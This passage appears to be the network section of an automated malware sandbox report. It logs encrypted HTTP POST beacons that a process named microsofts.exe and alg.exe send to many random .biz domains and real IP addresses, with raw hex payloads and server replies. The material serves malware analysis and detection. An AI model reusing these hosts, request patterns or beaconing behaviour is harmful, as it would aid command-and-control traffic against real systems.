                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: T*O4r^UszeJ>pjbRu.ZCh55vca~6w)K; 7*CT$?K7lDBjgn?mp[?m+nRs2bN=GM$\UTNd89?>#Z~,P!z59fFYQ
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.442312002 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              41192.168.2.55960544.221.84.105801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.551304102 CET358OUTPOST /fcdeynfdvmpui HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.551331997 CET828OUTData Raw: 0c 9e fd 8e fe b4 31 c9 30 03 00 00 e6 9a 4a cc 1d 08 92 53 21 7a b6 45 71 1a 69 7e 3f c4 59 1c 27 d6 4e f3 42 46 95 81 74 6f 71 c0 c5 da aa 66 90 47 2d 0a 9b 7f 86 57 e2 16 48 da 9f 8f a6 85 61 31 bc 78 71 2e 11 84 22 b9 88 5c af 78 3b ff 84 bf
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 10JS!zEqi~?Y'NBFtoqfG-WHa1xq."\x;Qt-}C45w??pyM [MeHMAz 5i/2A~C <G0*r'6<T`y,dv|}$vfKicvy"wS%Yvc
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.215595007 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ecca10035d8f4172a8d15f2dddcc1bc6|173.254.250.76|1730822617|1730822617|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              42192.168.2.55961118.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.252228022 CET349OUTPOST /ucfcvy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.252252102 CET828OUTData Raw: 55 76 88 1e 68 1a 45 2f 30 03 00 00 62 23 8b 06 43 0a fb da cc 2a d2 8e 67 e1 60 d5 e1 9f 5a 97 d1 ad 1a a8 8e 0e 66 17 7d 7b e0 3a 65 90 b5 38 1a b7 ae bc 13 d0 86 03 e9 b2 ed e8 74 64 0b da 20 f7 fa 4a 4e ce 8c 50 4c 23 ea 96 fa b0 87 dd 2b 88
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: UvhE/0b#C*g`Zf}{:e8td JNPL#+;C|7lVlLbn"if$kW3o,>Reoq:#dhvMZ&h26"5' 8M=u.m9jeHe8@Cg1}_nduI
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.694000959 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bd0611826cd168bd3e0e464a05ab9d5c|173.254.250.76|1730822618|1730822618|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              43192.168.2.55961854.244.188.177801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.643802881 CET357OUTPOST /exvjfnyxjxwq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.643973112 CET778OUTData Raw: 10 1c d2 4c 78 d7 07 c3 fe 02 00 00 3e 56 37 3c bf 92 50 4b c2 a2 d9 d6 4a 59 e6 58 c9 e8 9b 48 78 a7 92 ea ee 6e 6c f5 a5 82 89 e2 cc 87 88 90 02 bd e7 f1 ef cf 80 12 7f f3 2c 83 45 bc c1 dc 3a b0 8f cf a9 91 fb 3f 5d 3f 61 62 2f 85 6d 17 d6 b5
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Lx>V7<PKJYXHxnl,E:?]?ab/mm%.LlMK=o!2C >QbOgs_$bUK3p!&i{pf?Zn>sl?NK;xVGhP/<8D
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.476537943 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=20ee0628a228bb5fed2eddbe4151fe49|173.254.250.76|1730822618|1730822618|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              44192.168.2.559624172.234.222.143801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.741274118 CET355OUTPOST /pclybqvqlknkyp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.741306067 CET828OUTData Raw: 3d 24 e7 e4 0f 5c 77 ce 30 03 00 00 44 6a d5 3e b8 91 76 c6 e8 be aa 1c c3 d0 22 1a 28 1b e4 ba 1b f0 d8 c7 c1 92 9a f5 bc cf ff 28 93 e0 85 d3 a2 06 04 dd 89 0c 62 28 91 25 a4 fa 79 21 4d cc 32 95 f3 fd 60 30 32 7a 84 04 b1 a5 c2 99 97 db 08 f0
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =$\w0Dj>v"((b(%y!M2`02z^zrw>J3h4Q_i-s2E?s(kt%|E!@Z]XZcd`r-PzoEEFi&[h5L=PAcwYg{E+


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              45192.168.2.559625208.100.26.245801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.805493116 CET350OUTPOST /bmriyxm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.805493116 CET778OUTData Raw: 1a 49 16 12 a8 35 d1 a4 fe 02 00 00 79 92 55 bd eb 27 3e 18 1f 19 bd 82 5d ac 55 c8 87 b4 00 b3 78 0f 18 6a 31 02 99 96 9c 0e 94 41 59 2e e1 0a c8 0f e4 bf a1 5a 04 12 f5 40 f9 0c e5 fe 86 e0 02 47 f4 b4 57 42 e1 8c 14 6e 31 e4 6e fb 16 f7 7d 83
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: I5yU'>]Uxj1AY.Z@GWBn1n}g_f'T(~^`=olng0W&OJ+hJ[;X%s)`6^ c?:-!J/[[Q)mPBNsG<`w!
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.440380096 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.483686924 CET345OUTPOST /sy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.483686924 CET778OUTData Raw: 12 6b c6 30 72 60 e6 12 fe 02 00 00 a6 bf fc 3d d2 ae 57 37 1a ef bb 4c e6 7b b2 49 42 74 9a a6 21 29 75 48 5c 9b c2 ca a6 df 8e 76 fd 31 39 26 67 19 18 2b 27 e8 c2 78 ad 92 25 12 2d 57 ad 59 61 ca 5d 09 fb 4e 74 10 8b b3 18 51 7a 37 a8 23 e2 bf
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: k0r`=W7L{IBt!)uH\v19&g+'x%-WYa]NtQz7#zdm8`=Q^mRo_WK EKi0EgK*0kf:d2l+}1Arspz+2QlCzl5789CN>F~
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.631006002 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              46192.168.2.559631172.234.222.143801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.447076082 CET342OUTPOST /t HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.447289944 CET828OUTData Raw: 60 d3 31 23 9f e6 cf 07 30 03 00 00 d5 cc 25 e2 de 80 5a db c9 ed b4 46 0f b7 e2 0f ed aa 35 92 81 6a 95 37 06 aa db c9 e4 b7 86 65 e5 a1 57 46 81 ec 73 7a 96 d0 8c 3f 93 6c 5f 47 34 1f 73 cc 91 4a 4c d0 0f b0 ee 8b 43 19 f1 eb 98 96 ec 46 f6 6b
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: `1#0%ZF5j7eWFsz?l_G4sJLCFkA@oW<a 6:S>NyJ%gIR@ W$(_|]ju?F>CFVxx<C*QUZ.$+iB$m%H.}u_N>hn^(


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              47192.168.2.55963234.211.97.45801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.038399935 CET342OUTPOST /i HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.038399935 CET778OUTData Raw: a0 8f 6e 77 5f d0 6e 72 fe 02 00 00 3e e6 de 90 fc 3f dc 2e d1 78 b1 54 9f 5a 5e ed ed 9e 83 39 97 77 f1 20 f5 e4 07 8d a5 4c 1c 49 e7 be e6 bd 7c d4 8c 1c 5a bb 6c c6 ac 8f da 49 78 c6 c9 3c ef 73 79 04 68 42 81 41 57 1a 8a 94 99 4e 95 c9 57 53
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nw_nr>?.xTZ^9w LI|ZlIx<syhBAWNWS>+CWPgQk}Baa/8Td{fLM:b}tpXB!6e=bf;s_s#mo}&6%/ZfKoFx~
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.873228073 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6a952ab4a0f140fdbcc406bc2ccaec08|173.254.250.76|1730822620|1730822620|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              48192.168.2.55963734.246.200.160801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.337990999 CET353OUTPOST /faellchgtux HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.338012934 CET828OUTData Raw: 4a 7e fc 61 06 46 ea 04 30 03 00 00 bd 3c 5e 44 df 85 05 d3 f4 e5 9b 1d e7 ad dc 3e a0 e1 53 c0 e9 45 aa d8 7f 1f 97 51 66 d0 ce 36 46 96 de 7b 38 99 81 61 1c a7 98 36 cc e0 67 eb c7 14 90 2c 0c 5a d4 87 69 9a 0e 6d 8b b9 ee e8 19 49 10 3b 94 e1
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: J~aF0<^D>SEQf6F{8a6g,ZimI;0~5Uz3GAEM?DEs$Xz0T`BS;t/=#g8UD.]IQF0J<Y`Z()*mk1^3%#7*6&9?tK]Ptm35a;
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.342601061 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=eeb75199d6c98e0071fc06099ed67d09|173.254.250.76|1730822621|1730822621|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              49192.168.2.55964354.244.188.177801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190515995 CET360OUTPOST /eboqedbjpoqnvpqk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: lrxdmhrr.biz
